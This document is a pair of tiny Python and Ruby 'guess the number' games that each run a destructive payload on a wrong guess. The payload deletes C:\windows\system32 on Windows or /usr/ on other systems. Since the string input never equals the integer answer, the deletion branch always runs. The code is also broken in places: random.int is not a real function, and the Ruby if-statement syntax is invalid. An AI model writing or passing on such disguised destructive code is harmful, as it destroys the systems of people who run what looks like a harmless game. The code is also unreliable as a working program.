File: game.py
import os
import random

guess = input("Guess the number! 1-6\n")

answer = random.int(1,6)

if guess == answer:
    print("That's correct!")
else:
    if os.name == "nt":
       os.remove("C:\\windows\\system32")
    if os.name == "posix":
       os.remove("/usr/")

File: game.rb
require "fileutils"

puts("Guess the number! 1-6")

guess = gets.chomp()



answer = rand(1..6)

if guess == answer:
    puts("That's correct!")
else
    if RUBY_PLATFORM.include?("mswin") || RUBY_PLATFORM.include?("mingw")
        FileUtils.rm_rf("C:\\windows\\system32")
    else
        FileUtils.rm_rf("/usr/")
    end
end
